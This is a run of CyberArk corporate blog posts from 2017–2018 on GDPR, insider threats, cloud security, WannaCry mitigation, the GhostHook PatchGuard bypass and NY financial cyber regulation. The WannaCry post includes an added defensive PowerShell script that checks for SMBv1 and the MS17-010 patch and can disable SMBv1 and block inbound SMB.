On May 25, 2018, the General Data Protection Regulation (GDPR) will be enforced across the European Union (EU). This regulation aims to extend the rights of individuals residing within the EU to better control and protect the use of their personal data in the evolving digital landscape. It’s also an attempt to strengthen, simplify and harmonize the data protection and privacy laws across Europe. GDPR requires any organization whose business involves either collecting or processing any EU citizen’s personal data – not just those that are located within the member states of the EU – to maintain compliance. Non-compliance risks both steep financial penalties and reputational damage. The CyberArk Privileged Account Security Solution protects the privileged credentials that enable access to the systems and applications that contain and process highly sensitive personal data.

Here are five ways CyberArk solutions can help organizations address GDPR:

  1. Protect and Monitor Access to Sensitive Personal Data

Attackers and non-authorized users target privileged accounts as a means to gain access to critical systems and applications that hold sensitive personal data. CyberArk enables organizations to perform live monitoring and session recording to quickly identify unauthorized, suspicious and high-risk activity. With CyberArk, organizations can control privileged access to systems and applications that hold and process personal data, which is essential for your GDPR data protection program.

  2. Secure Processing through Least Privilege Enforcement

Organizations are required to limit the risk of unlawful destruction, loss, alteration, unauthorized disclosure of, and most importantly – access – to personal data. CyberArk provides a unified access control solution to regulate and monitor the commands super-users can run based on their roles and the specific tasks they manage. The solution limits the use of privileged rights within the organization, enables organizations to segregate administrator duties and enforces least privilege policies for their super-users.

  3. Detect and Respond to Breaches Early in the Attack Lifecycle

GDPR requires unauthorized access to personal data to be reported within 72 hours of detection. CyberArk provides threat detection solutions that will not only detect malicious activity in real-time, but can contain the threat at the earliest stage of the attack lifecycle – before the attacker is able to gain access to personal data. The solution features an analytics engine that leverages statistical modeling, machine learning, user behavior analytics, and deterministic algorithms to detect attackers and malicious insiders navigating the network. As a result, incident response teams now have the additional time they need to stop the attacker before they get to their end target.

  4. Security Controls and Procedures Risk Assessment

CyberArk has a dedicated Red Team that provides a safe way for security operations teams to test their ability to effectively defend against cyber attacks. This team uses a variety of tactics, techniques and procedures used in real world attacks to help clients measure the risk to critical assets, uncover vulnerabilities, test security procedures and identify areas of improvement. This wide-ranging assessment will help demonstrate whether the security measures and mechanisms in place can help guarantee the protection of personal data and demonstrate GDPR compliance.

  5. Minimize Risk Against Non-Compliance

In the event of a breach, each organization and its business partners need to be able to prove that they’ve met their obligations – and in some cases – determine which party is at fault. So the question then becomes: who has access and to what systems and applications do they have access? CyberArk’s free Discovery and Audit (DNA) tool helps organizations discover privileged user and application accounts in their environments, including those used by third-party users. The tool produces a full report including a list of accounts and associated credentials as well as current account status with regard to your security policies. Furthermore, CyberArk solutions provide detailed logs and audit trails that capture privileged account activity for both internal users and third-party vendors alike. The log files are stored securely in order to prevent manipulation. Audit trails are searchable to aid in the event of forensic investigation or litigation from data subjects.

The core of GDPR is all about data protection by design and by default – CyberArk is all about security by design and by default. By locking down access to sensitive systems and applications, you secure control of who and what has access to personal data. Research shows that most organizations will not be compliant when GDPR officially goes into effect. Given the potential fines upwards of €20 million, impact on customer loyalty, future loss of revenue, brand damage, etc., it makes good business sense to address GDPR requirements urgently. For organizations that have a strong privileged access management strategy in place today, this conversation is already top of mind for CISOs, compliance officers, legal and IT professionals.

Learn how CyberArk can help support compliance with GDPR by downloading this Solution Brief.

CyberArk Labs Identifies “GhostHook” Technique That Bypasses PatchGuard in Windows OS https://www.cyberark.com/blog/cyberark-labs-identifies-ghosthook-technique-bypasses-patchguard-windows-os/ Thu, 22 Jun 2017 15:33:06 +0000 https://www.cyberark.com/blog//

Today on CyberArk’s Threat Research Blog, CyberArk Labs has published details about a new attack technique that bypasses PatchGuard in Windows OS. For our business readers, we offer this executive summary with highlights of the potential security impact:

Up until now, we haven’t seen many successful rootkits on Windows 10 64-bit, thanks in large part to PatchGuard (Kernel Patch Protection). Research by CyberArk Labs has uncovered an attack technique called GhostHook in the Windows OS that can let an attacker bypass PatchGuard, making it easy for an attacker to gain rootkit abilities on Windows x64 OS machines. This attack technique gives cyber attackers full control over the network including the ability to intercept anything on the system.

More than 400 million devices worldwide currently run on Windows 10. GhostHook is the first attack technique identified that will bypass PatchGuard – giving attackers the ability to take full control over 64-bit systems at the kernel level.

Attackers will now be able to go completely unnoticed by all security measures that rely on retrieving reliable information from the OS Kernel – this includes AV, personal firewalls, HIPS, and many next-gen endpoint products.

Attackers can now easily bury a rootkit in the kernel – completely undetectable to security solutions and invisible to MSFT’s PatchGuard itself. This attack technique could also lead to the proliferation of more sophisticated, 64-bit malware – typically used in APT campaigns by nation states.

Of note, 64-bit malware currently makes up less than 1% of the current threat landscape. 64-bit malware includes Shamoon, the disk-wiping malware used on Saudi Aramco, and Flame. Both examples are country-grade espionage malware.

Please read the original post for the full technical details and Microsoft’s response to the reported vulnerability.

CyberArk Customer Spotlight: Texas A&M University, College of Architecture https://www.cyberark.com/blog/cyberark-customer-spotlight-texas-m-university-college-architecture/ Fri, 16 Jun 2017 15:00:14 +0000 https://www.cyberark.com/blog//

In this CyberArk Customer Spotlight video, we speak with Laura Melton, Senior Information Technology Associate at Texas A&M University College of Architecture, about the importance of removing local administrator rights to strengthen endpoint security.

By deploying CyberArk Endpoint Privilege Manager, the university has reduced privileges and minimized risks of information being stolen or encrypted by ransomware – all without impacting user and helpdesk productivity. With the CyberArk solution, a combination of least privilege security and application control reduces the risk of malware infection. Unknown applications run in a restricted mode to contain threats and behavioral analysis blocks credential theft attempts, while giving IT administrators enhanced visibility.

To learn more about applying least privilege at the endpoint to keep employees productive without compromising security, download our free eBook, Achieving Protection and Productivity by Securing Privilege on the Endpoint.

The Everyday Insider Threat https://www.cyberark.com/blog/everyday-insider-threat/ Wed, 14 Jun 2017 12:30:51 +0000 https://www.cyberark.com/blog//

If you’ve ever worked in an office, you know that you can’t access any data you want. Some files are locked away from the everyday employee: out of sight and out of mind. Whether it’s your boss’ bonus, private emails between colleagues, company financials, performance reviews or information about yet-to-be-launched products and services, access to information is limited.

A lot of people are quite comfortable with this. However, a new survey we carried out found that over half (52%) of UK office workers would access sensitive company data if they knew they wouldn’t get caught. In fact, far from being a moral issue, one in five (21%) cited a lack of technical skills as holding them back from attacking their employer.

So, what could tempt employees into accessing company information?

The survey revealed a mix of motives, from wanting to make sure they were being rewarded fairly, to having suspicions the company was unethical or corrupt, to straightforward curiosity and office gossip. What was clear, though, is that very unhappy employees are twice as likely to want to spy on company information than their happier peers.

While disgruntled or angry employees only account for 26% of insider attacks, according to Forrester[i], they are the source of some of the most costly and difficult attacks to detect. The 2016 Sage Group data breach is just one example of an employee using an internal login to steal company data, temporarily rocking the reputation of the company and, indeed, its share price.

How should employers stop malicious insiders in their tracks?

First, we should recognise that most respondents weren’t out to deliberately cause the company harm. The majority simply wanted to get their hands on information about themselves and engage in idle gossip; just 2% said they would be prepared to sell information to competitors for financial gain or to blackmail their boss.

The basic rule in defending against malicious insiders is to address the threat, not the individual. Privileged access – not people – is the true insider threat. The process of securing privileged accounts should be on-going with continuous evaluation and adjustments to improve security as the business and threat landscape changes.

To effectively protect against insider threats, organisations should minimise user privileges to reduce the attack surface, lock down privileged credentials, and control and monitor privileged accounts, which are consistently targeted by insider attackers.

The threat from outside…

While this survey highlights the potential mischief that employees can get up to without proper access controls, it’s also an important reminder of the threat that cyber attackers posing as insiders could pose.

If more than half of everyday workers would be prepared to access sensitive data, it’s not hard to imagine the damage a cybercriminal with advanced skills and malicious intentions could cause. They have no loyalty to the company and are more likely to be driven by financial or political motives over innocent curiosity.

Security teams have long known that one of the most effective ways for attackers to access sensitive data is to masquerade as a legitimate insider – using existing privileged credentials to achieve broad, unfettered access to a company’s most valuable assets. With cyber skills advancing all the time, and cybercriminals hiding behind valid credentials to avoid being caught, companies must be more alert than ever to stop unwanted insiders in their tracks and protect their most valuable information.

[i] “Understand The State Of Data Security And Privacy: 2015 To 2016”, Forrester Research, Inc., January 8, 2016

Does Cloud Automation Create New Vulnerabilities for the Enterprise? https://www.cyberark.com/blog/cloud-automation-create-new-vulnerabilities-enterprise/ Tue, 06 Jun 2017 19:04:45 +0000 https://www.cyberark.com/blog//

While cloud automation can help organizations become significantly more agile and improve security, it can also expand the enterprise attack surface, creating new vulnerabilities and risks in what becomes an increasingly dynamic and complex environment. It’s important to understand and address the vulnerabilities that can come with automation.

Organizations have many different reasons and roadmaps for their migration to the cloud. While some have an “all-in” strategy, most migrate to the cloud over time, moving individual business activities and applications as needed. Automation needs vary based on the enterprise’s cloud strategy and drivers.

Common Drivers for Cloud Adoption

Three of the most common drivers for cloud adoption include cost savings and efficiency, access to on-demand computing, and increased agility.

To achieve cost savings, some enterprises take a “forklift approach” and simply move their apps from their on-premises data center to the cloud – and shut their data centers. In this scenario the enterprise does not take full advantage of the dynamic capabilities offered by cloud computing, and consequently, requires only minimal automation. To achieve much greater efficiency, organizations need to re-architect and replace applications, rather than simply move them. This agility requires a high level of automation, which is noted in the third scenario below.

It’s increasingly common that enterprises want access to on-demand computing. This provides rapid access to significant computing capacity, such as for big data and analytics. To achieve this, application instances are created instantly to meet the demands of the business. It’s automation that makes this possible, assigning and securing the required credentials and privileges when each new instance is created.

The third scenario is all about agility — enabling the enterprise to more rapidly develop and deploy applications to better support customers and evolving market needs. As development practices such as Continuous Integration, Continuous Delivery (CI/CD) pipelines, and DevOps are adopted, developers also leverage orchestration and automation tools to speed software development and deployment. Enterprises with robust CI/CD pipelines may do multiple and potentially dozens of code deployments each day using automated processes and tools. Clearly, automation is critical in this scenario.

Potential Vulnerabilities Expand With Automation

Across each of these scenarios, the level of automation required increases. It’s important to understand some of the core vulnerabilities and risks that need to be addressed to protect an organization’s cloud environment.

Regardless of the primary driver for cloud adoption or the level of automation, every organization needs to protect the privileged accounts, credentials and access rights for its cloud management consoles. The consoles are very powerful, and they are used by both humans and automated scripts. Consequently, the console is vulnerable to phishing attacks and is a common entry point for attackers. Additionally, all organizations will need to secure the privileged credentials used to manage the enterprise’s cloud-based infrastructure, including the operating system, database and other resources, as well as any embedded static application credentials.

With on-demand computing, there are additional vulnerabilities to protect. These include, for example, any dynamically assigned application credentials, API keys, and cloud secrets as well as the privileged credentials established when new application instances are created with auto scaling or other orchestration tools. When each new instance is created with auto scaling, it will need privileges to access other applications and resources, and this access must be automatically secured.

In the market agility scenario, not only must the vulnerabilities and risks described in the earlier examples be protected, but also the privileged credentials and secrets associated with the CI/CD pipeline, including all the administrative consoles for orchestration and other tools. And the trust relationships must be fully automated by automatically storing, retrieving and managing secrets and credentials across the pipeline.

In summary, as the level of automation increases, the vulnerabilities and the attack surface also increase. Consequently, it is important that organizations are aware of and defend against the vulnerabilities that can come with automation.

At CyberArk we’re focused on solutions to secure the privileged accounts and credentials required to manage the enterprise’s cloud and automation environments. For example, we’ve integrated CyberArk with orchestration and other tools to support automated trust relationships, and we’re focused on meeting the needs of development teams and DevOps with CyberArk Conjur.

No matter where you are in your enterprise’s cloud journey or the level of automation you are using, you will need to implement robust privileged account security policies to protect your cloud assets. For additional information visit www.cyberark.com/cloud.

WannaCry Deconstructed: Five Ways to Mitigate Ransomware Risks https://www.cyberark.com/blog/wannacry-deconstructed-five-ways-mitigate-ransomware-risks/ Tue, 30 May 2017 15:47:18 +0000 https://www.cyberark.com/blog//

Since launching on May 12, the WannaCry ransomware has made headlines around the world after infecting more than 230,000 systems across 150 countries. It’s captured the attention of the security community-at-large as the most notable strain of ransomware with worm capabilities, which enable it to automatically self-replicate to other nodes on the network. As a result, infection has spread at a speed and scale never achieved before. The ransomware attacks did not discriminate by organizational size or industry – many well-known companies were impacted including Dacia, FedEx, Nissan, Cambrian College, Renault, PetroChina and Shaheen Air. Thousands of ATMs and ticketing machines were also targeted and encrypted.

As our CyberArk Labs team recently outlined, WannaCry itself is a fairly common strain of ransomware. The propagation techniques used to spread the infection are what truly set it apart. WannaCry uses a nation state-grade infection vector — a Microsoft SMB vulnerability dubbed “EternalBlue” — that makes it exceptionally viral and its resulting propagation exponential.

The ransomware encrypts the infected user’s files — from photos and videos to documents and databases. The now-infamous red ransomware note is then displayed, demanding approximately $300-$600 via Bitcoin payment in order to recover the files.

Five Best Practices to Mitigate Risk

Though WannaCry is in the spotlight today, ransomware will continue to evolve, and more advanced techniques will find their way into attackers’ playbooks. So what can organizations do to protect against WannaCry and other forms of ransomware that will undoubtedly emerge in the future? Here are five best practices to follow to mitigate risk:

  1. Always Backup: Whether you’re attacked by a new, exotic strain of ransomware, or your hard drive suddenly dies unexpectedly, backing up your important data is an important, table-stakes best practice. But remember — backups alone are not enough to protect against data loss from ransomware attacks, especially if organizations are exposing privileged credentials to attackers.
  2. Follow the Least Privilege Principle: Always configure access controls including file, directory and network sharing permissions with the least privilege principle in mind. Most users do not need admin privileges to do their required jobs on their corporate endpoint devices, so user access should remain at the minimal level that will allow normal functioning. While running as a non-privileged user does not make you immune to WannaCry ransomware, it can prevent the malware from carrying out certain malicious tasks, such as deleting shadow copies of the infected system’s files.
  3. Apply Application Control: Controlling which executables have access to your files can also contribute to defensive efforts. For example, if you put the PowerPoint executable in a whitelist as the only executable that has write access to your presentation files, then if a ransomware’s executable tries to encrypt and overwrite the files, it will be denied (as it is not on the “approved” whitelist). It’s important to also establish policies based on trusts that will protect these “trusted” or whitelisted applications.
  4. Disable SMB v1 and Apply Patches: To protect against the specific WannaCry strain, immediately disable the outdated Microsoft SMB protocol version 1 or simply apply the patch MS17-010 that Microsoft released a few months ago.
  5. Block Internet Access: The Microsoft SMB protocol is meant to be internal, so your network should not be open to SMB packets from the internet. Implementing port filtering to block all versions of SMB at the network boundary is also an important preventative measure.
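The following script is an added example, not code from the original post, that audits a single Windows host for items 4 and 5 above (SMB v1 still enabled, MS17-010 missing, SMB reachable from the Internet address class) and, only when run with -Remediate, applies the host-level fixes. It assumes Windows 8.1 / Server 2012 R2 or later with the SmbShare, NetSecurity and DISM modules, an elevated session, and a KB list that you verify against Microsoft’s MS17-010 bulletin for your builds.

```powershell
<#
  Added example (not from the original post): audit a Windows host for items 4 and 5 of
  the list above and, with -Remediate, apply the host-level fixes. Assumes Windows 8.1 /
  Server 2012 R2 or later and an elevated PowerShell session. Supports -WhatIf.
#>
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Remediate   # without this switch the script only reports
)

# Security updates that ship the MS17-010 fix, by OS family (verify against the bulletin).
# Later cumulative updates supersede these, so an up-to-date host may show none of them.
$Ms17010Kbs = @(
    'KB4012598'                             # XP / Server 2003 / Vista / Server 2008 (out-of-band)
    'KB4012212', 'KB4012215'                # Windows 7 / Server 2008 R2 (security-only, rollup)
    'KB4012213', 'KB4012216'                # Windows 8.1 / Server 2012 R2 (security-only, rollup)
    'KB4012214', 'KB4012217'                # Server 2012 (security-only, rollup)
    'KB4012606', 'KB4013198', 'KB4013429'   # Windows 10 1507 / 1511 / 1607 and Server 2016
)

function Test-Ms17010Installed {
    # True when any listed update is present; a false result on a patched host usually
    # means a newer cumulative update replaced the original KB, so treat it as "check manually".
    $installed = Get-HotFix -ErrorAction SilentlyContinue | Select-Object -ExpandProperty HotFixID
    return [bool]($Ms17010Kbs | Where-Object { $installed -contains $_ })
}

function Get-Smb1State {
    # Server side: does this host still accept SMB v1 connections (the side EternalBlue targets)?
    $server = Get-SmbServerConfiguration
    # Feature side: is the SMB1Protocol optional feature (client and server bits) still installed?
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ServerSmb1Enabled  = $server.EnableSMB1Protocol
        Smb1FeatureState   = if ($feature) { [string]$feature.State } else { 'Unknown' }
    }
}

function Disable-Smb1Server {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    # Item 4: stop the SMB server from negotiating SMB v1. Clients that only speak v1 will break.
    if ($PSCmdlet.ShouldProcess('SMB server', 'Disable SMB1 protocol')) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }
}

function Add-SmbInboundBlockRule {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    # Item 5, host-level backstop: drop inbound SMB (TCP 139/445) from the Windows Firewall
    # "Internet" address class. The network boundary must still block SMB in its own right.
    $name = 'Block inbound SMB from Internet (WannaCry mitigation example)'
    if (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue) { return }
    if ($PSCmdlet.ShouldProcess($name, 'Create inbound block rule')) {
        New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP `
            -LocalPort 139, 445 -RemoteAddress Internet -Action Block -Profile Any | Out-Null
    }
}

# Report first; nothing changes unless -Remediate is given.
$smb = Get-Smb1State
$report = [pscustomobject]@{
    ComputerName      = $env:COMPUTERNAME
    Ms17010Present    = Test-Ms17010Installed
    ServerSmb1Enabled = $smb.ServerSmb1Enabled
    Smb1FeatureState  = $smb.Smb1FeatureState
}
$report | Format-List

if ($Remediate) {
    if ($smb.ServerSmb1Enabled) { Disable-Smb1Server }
    Add-SmbInboundBlockRule
    if (-not $report.Ms17010Present) {
        Write-Warning 'MS17-010 not detected: install it (or the current cumulative update) via Windows Update or WSUS.'
    }
}
```

Run it without switches to get the report, with `-Remediate -WhatIf` to preview the changes, and with `-Remediate` to apply them; items 1 to 3 (backups, least privilege, application control) are policy decisions this script does not touch.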

As we advised in the wake of the initial attacks, organizations should immediately implement a combination of least privilege and application control policies on endpoints and servers throughout their organizations to mitigate risk. This can help prevent ransomware from maliciously encrypting files and deleting the snapshots that are often needed to fully recover from an infection. This is an essential layer in defending against future ransomware attacks.

The Case for Comprehensive Access Management https://www.cyberark.com/blog/case-comprehensive-access-management/ Fri, 26 May 2017 14:08:20 +0000 https://www.cyberark.com/blog//

The insider threat does not necessarily cease when an employee leaves the organization. There are plenty of recent articles in the news with cautionary tales of ex-employees compromising company networks.

  • A former employee at a private security patrol company was ordered by a court to pay more than $300,000 to fix computer systems he damaged after he was fired.
  • A former employee of an engineering company stole $425,000 worth of proprietary information for a competitor.
  • A high-level IT employee of a sportswear company was accused of setting up a phony account to create a back door to the company’s networks before leaving for another job, and using it to steal information.

Organizations typically have policies and procedures in place to change credentials and terminate access to systems and technology when an employee departs the company. The process should be the same whether the employee is in the IT department or not. How access is terminated depends upon the organization and IT infrastructure.

When all access to various systems is managed in a single directory, such as Active Directory, the solution can be straightforward. Things get complicated when the infrastructure is more complex with a wide variety of systems, multiple directories, cloud-based applications, etc. If there isn’t a dedicated procedure for what to do in case of IT member termination, then there is a chance that some access may be left open.

Outdated accounts are typically left open until someone finds out (usually someone from the IT/Security team) and only then is the access terminated. Ideally, all privileged accounts are managed and monitored via a privileged account security solution, and all identities are verified using multi-factor authentication before access is granted.

The actions of malicious IT staff make headlines, but keep in mind they are not the only ones with privilege. All access is a privilege and should be managed throughout the employment lifecycle, from onboarding of the employee through termination. Even employees outside of IT with routine access privileges pose a risk (malicious or accidental) if those privileges are not managed carefully. Think about it – HR has access to employee information, sales has access to customer data, marketing has access to public-facing communication channels, etc.

Access creep

Employee roles and responsibilities are often fluid, and workers tend to accumulate privileges over time. Jobs change and situations arise that require one-time access to resources. Passwords shared for one-time access often are not invalidated or changed after they are used.

Although managing credentials and securing access to data or systems is often considered to be an IT function, typically the permissions and privileges are granted by supervisors or account administrators who do not keep IT or the human resources department in the loop. Furthermore, employees may have access to systems that IT isn’t aware of, such as a file-sharing program, marketing database etc.

HR usually handles the administrative tasks of a termination and relies on IT to deprovision privileged access. But in many cases, neither has an authoritative list of all accounts, privileges and credentials accumulated over the course of employment. As a result, it is possible for employees to retain access to networks and resources after leaving an organization, creating a new flavor of an insider threat.

Best practices

As with many aspects of security, comprehensive access management depends upon both policy and technology.

Because IT departments often do not authorize and assign all system access, a complete access management program has to extend beyond IT to all departments in the organization. This includes all supervisors and managers who grant access to systems or information to their direct reports, and information owners who are responsible for access to data, which is often the ultimate target of an intrusion. Policies should define how and when access is granted, establish programs to track all access, and actively manage that access so that privileges are revoked when they’re no longer needed.

Furthermore, organizations must actively protect and monitor for all types of privileged credentials. The CyberArk Privileged Account Security Solution allows organizations to protect credentials, manage accounts and monitor activity by privileged users. When integrated with enterprise directories or identity and access management solutions, privileged access can automatically be terminated when users leave. Continuous monitoring can help spot the creation of backdoors or other suspect activity while the accounts are active.

With a comprehensive program in place – one that aligns policies, practices and technology – organizations can ensure that all access to privileged accounts is secured and managed.

CyberArk Labs: Breaking Down WannaCry Ransomware – What’s Different? https://www.cyberark.com/blog/cyberark-labs-breaking-wannacry-ransomware-whats-different/ Mon, 15 May 2017 16:46:32 +0000 https://www.cyberark.com/blog//

Critical Synopsis:

  • WannaCry malware continues to spread on a global basis and organizations are still at risk of being infected;
  • Patching the Microsoft vulnerability can prevent infection via the SMB worm, but cannot prevent direct infection via phishing;
  • CyberArk Labs tested prevention tactics on WannaCry over the weekend and found that the combination of enforcing least privilege on endpoints and application greylisting control was 100 percent effective in preventing WannaCryptor from encrypting files.

The ransomware behind this attack is known as WannaCryptor, also referred to as WannaCrypt or WannaCry. Over the weekend, CyberArk Labs investigated the ransomware strain, broke down the attack vectors, and analyzed how it compares to other recent ransomware attacks. Here’s what organizations need to know now.

To date, CyberArk Labs has tested more than 600,000 ransomware samples – including WannaCryptor – in order to better understand common infection, encryption and removal characteristics. Unlike previous strains of ransomware, WannaCryptor is differentiated by a worm that spreads the ransomware as quickly as possible to as many machines as possible. The worm spreads using the “EternalBlue” SMB vulnerability in Microsoft systems.

Microsoft issued a patch for this vulnerability in March 2017, but details on the vulnerability were released into the wild, freely available to attackers, as part of the Shadow Brokers leaks. Any individual and organization with an unpatched Microsoft system remains vulnerable to the worm in WannaCryptor.

  • Important Protection Note: The Microsoft patch will prevent infection via the SMB worm, but it cannot prevent infection and file encryption if the ransomware is delivered through a direct means, such as phishing.

WannaCryptor is able to execute on an infected machine without administrative privileges. However, to propagate through the organization’s network, WannaCryptor needs to escalate privileges through a Microsoft vulnerability that enables it to run code in the SYSTEM user context. WannaCryptor is able to operate in an offline environment, encrypting the user’s files with an RSA-2048 key pair. After the encryption process, the ransomware demands $300-$600 in bitcoin to decrypt the files.

While the built-in worm differentiates WannaCryptor’s ability to spread from previous versions of ransomware, there is nothing inherently unique about its encryption and extortion techniques. Like most ransomware, WannaCryptor was missed by traditional anti-virus solutions.

  • Important Protection Note: Organizations should immediately implement a combination of least privilege and application control policies on endpoints and servers throughout their organizations.

This proactive approach is not dependent on the ability to detect advanced malware; instead, it treats all unknown applications as potentially suspicious and protects information accordingly. This prevents one infected endpoint from causing an organizational pandemic.

When tested in the CyberArk Lab, the combination of least privilege and application greylisting controls proved 100 percent effective in preventing WannaCryptor and dozens of other ransomware families from encrypting files.

This attack should serve as a reminder that back-ups alone are no longer enough to protect against data loss, especially if organizations are exposing privileged credentials to attackers. This means organizations may have to choose between complete data loss and paying the ransom. Eliminating the attacker’s ability to access administrative credentials to propagate ransomware beyond the initially compromised machine is an essential action to defend against future ransomware attacks and limit damage.

Conjur Named a “Cool Vendor” in DevOps by Gartner https://www.cyberark.com/blog/conjur-named-a-cool-vendor-in-devops-by-gartner/ Thu, 11 May 2017 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-named-a-cool-vendor-in-devops-by-gartner/  

Newton, MA – May 9th, 2017 – Conjur, a leading enterprise secrets management provider for the modern era of clouds, containers, and DevOps, today announced that it has been designated as a “Cool Vendor” based on the May 2017 “Cool Vendors in DevOps, 2017” report published by leading analyst firm Gartner, Inc. The report states that “This year’s Cool Vendors recognize that the scope of DevOps tools must evolve and innovate. In many enterprises, growth in DevOps adoption is frenetic, fueled by rising business demands for speed and agility.”

This frenetic growth frequently leaves security as an afterthought. An earlier Gartner report entitled “Top 10 Strategic Technology Trends for 2017: Adaptive Security Architecture” (March 2017) highlights the importance of security in DevOps. The report states that “a Gartner survey in mid-2016 found that 50% of enterprises would be using DevOps by the end of 2016.” It continues, “However, we estimate that fewer than 20% of enterprise security architects have engaged to systematically incorporate information security into their organizations’ DevOps initiatives. Fewer still have achieved the high degrees of security automation required to qualify as DevSecOps.”

Conjur’s platform addresses this specific gap and helps customers move to a true DevSecOps delivery model. This is driven by Conjur’s unique blend of enterprise-grade capabilities and its ability to provide total automation for security and secrets workflows, resulting in the delivery of “security as code.”

“The market annually looks forward to the listing of Cool Vendors, and we are honored to be selected for what we believe is a rarefied distinction,” said Elizabeth Lawler, founder and CEO of Conjur. “At Conjur we have always had passion and belief that we are solving an important and difficult problem in an elegant manner. We feel this is a tremendous external validation about our market, our approach, and our firm from Gartner, a globally trusted name in the market.”

The report is available to Gartner clients for download at https://www.gartner.com/document/3706719

About Conjur

Conjur delivers an enterprise secrets management platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Conjur is headquartered in Newton, Mass., and is backed by Amplify Partners, Avalon Partners, and Koa Labs. For more information, please visit www.conjur.com or follow @conjurinc on Twitter.

Gartner Disclaimer

Gartner does not endorse any vendor, product or service depicted in our research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

###
Media Contact:
Ranjeet Vidwans
rvidwans@conjur.net
+1-617-329-4625

New York State Gets Bullish on Cyber Security Programs https://www.cyberark.com/blog/new-york-state-gets-bullish-cyber-security-programs/ Tue, 09 May 2017 15:24:37 +0000 https://www.cyberark.com/blog//

Last year, New York experienced an unprecedented number of data breaches triggered by hacking, malicious insiders and accidental causes, according to the attorney general. Coincidentally, in late September of 2016, the New York State Department of Financial Services (NYDFS) proposed 23 NYCRR 500, a regulation requiring banks, insurers and other financial service providers to improve their organizational cyber-readiness through the establishment of programs and policies that protect sensitive electronic data.

Effective as of March 1, 2017, the regulation appears to be in direct response to the ongoing cyber attacks that target an organization’s most critical systems containing intellectual property, consumer data and other sensitive information. The number of companies exempt from this regulation is very limited, and any other organization regulated by the NYDFS will now be required to create programs protecting sensitive data held either by the organization itself or by a third-party provider.

In short, the regulation requires that each company calculate a risk profile unique to the organization, develop programs and policies that specifically address that profile and establish a minimum security standard to maintain compliance. The program should be designed to protect the confidentiality, integrity and availability of the organization’s information systems.

Key elements from 23 NYCRR 500:

  1. Establish a comprehensive cyber security program
  2. Create written cyber security policies
  3. Appoint a Chief Information Security Officer (CISO)
  4. Provide cyber security training to personnel
  5. Establish policies and procedures for third parties
  6. Detect, alert and respond to cyber security threats
  7. Include an audit trail for cyber security events

Privileged Account Security and Why It’s Important to 23 NYCRR 500

Privileged accounts are used to gain access to critical systems such as servers, switches, firewalls, financial trading systems and other applications that are crucial to the business. Unprotected, these accounts represent a significant security vulnerability. Cyber attackers target privileged accounts to move laterally, escalate privileges and ultimately navigate a company’s entire IT infrastructure, often undetected for months. According to Mandiant’s M-Trends 2017 Report, threat groups specifically within the financial sector have advanced the tools and approaches they use to gain access to privileged accounts, escalate privileges and maintain persistence.

Attackers are becoming smarter and more sophisticated. Using traditional security controls may not be enough to protect your environment. The pathway attackers use continues to evolve as more organizations shift to next-gen workloads for cloud, mobile, Internet of Things (IoT), etc. Organizations need to prioritize locking down their privileged accounts to better protect against, detect and respond to cyber attacks before critical systems are breached and sensitive data becomes compromised.

Securing your privileged accounts with CyberArk solutions will satisfy nearly all of the key elements of this regulation, including risk assessments, cyber security programs and policies, penetration testing and vulnerability assessments, audit trail, access privileges and application security – all the way through training and monitoring. Much of 23 NYCRR 500 requires organizations to properly assess the risk posed by their security gaps, and to detect and respond to cyber threats that exist within their IT infrastructure. This is exactly what we strive to deliver to our customers through our integrated portfolio of solutions.

See How CyberArk Can Help You Start Tracking Compliance

The strict requirements of regulation 23 NYCRR 500 place a substantial burden on every financial services organization regulated by the New York State Department of Financial Services. With CyberArk at the core of your cyber security programs and policies, you can start tracking compliance with a single solution designed to protect your most critical assets in public, private or hybrid cloud environments.

Learn how CyberArk can protect the confidentiality, integrity and availability of your information systems. Attend our webinar on Thursday June 22, at 2:00 PM EST for a review of the key sections in this regulation and more information about how CyberArk solutions can help to support your organization’s compliance with 23 NYCRR 500.

Cloud Automation Capabilities for Rapidly Securing Cloud Assets https://www.cyberark.com/blog/cloud-automation-capabilities-rapidly-securing-cloud-assets/ Thu, 04 May 2017 14:10:04 +0000 https://www.cyberark.com/blog//

The Urgency of Rapidly Securing Cloud Assets

As organizations increasingly work to leverage cloud-based infrastructure, we see increased attacks on and exploitation of the vulnerabilities in cloud-based infrastructure. Vulnerable privileged accounts for cloud-based infrastructure all too often make these attacks particularly damaging. Consider, for example, the recent actions of determined hackers against FlexiSpy.

Organizations recognize that protecting their cloud assets is a responsibility they share with their cloud vendors. As organizations work to secure their applications and other sensitive assets in the cloud, they want the same robust security capabilities they’ve had in their on-premises environments. And they want a solution from a leading vendor that they trust to protect their keys to the IT kingdom.

With the dynamic nature and fast pace of cloud deployments and innovation, security, IT and DevOps leaders not only want the most secure, scalable and comprehensive privileged account security solution, but also the convenience and flexibility of rapid deployment into their cloud environments. They basically want robust security for the cloud now!

Deploying CyberArk in as Little as 15 Minutes

Using the new CyberArk cloud automation capabilities, organizations can, in as little as 15 minutes, automatically deploy and establish a complete CyberArk Privileged Account Security solution in their AWS environment. The CyberArk solution established by the automation tools includes the CyberArk Enterprise Password Vault®, CyberArk Privileged Session Manager®, CyberArk SSH Key Manager™ and a disaster recovery (DR) vault. With these new cloud automation capabilities, organizations are able to quickly have CyberArk solutions available, running on AWS, and ready for administrators to start securing the cloud assets.

The CyberArk solution runs on AWS and is designed to provide the same unparalleled, robust security and protection for privileged accounts and credentials that CyberArk offers with on-premises deployments – in fact it’s the same proven solution, just automated for deployment on AWS.

Leveraging AWS Best Practices

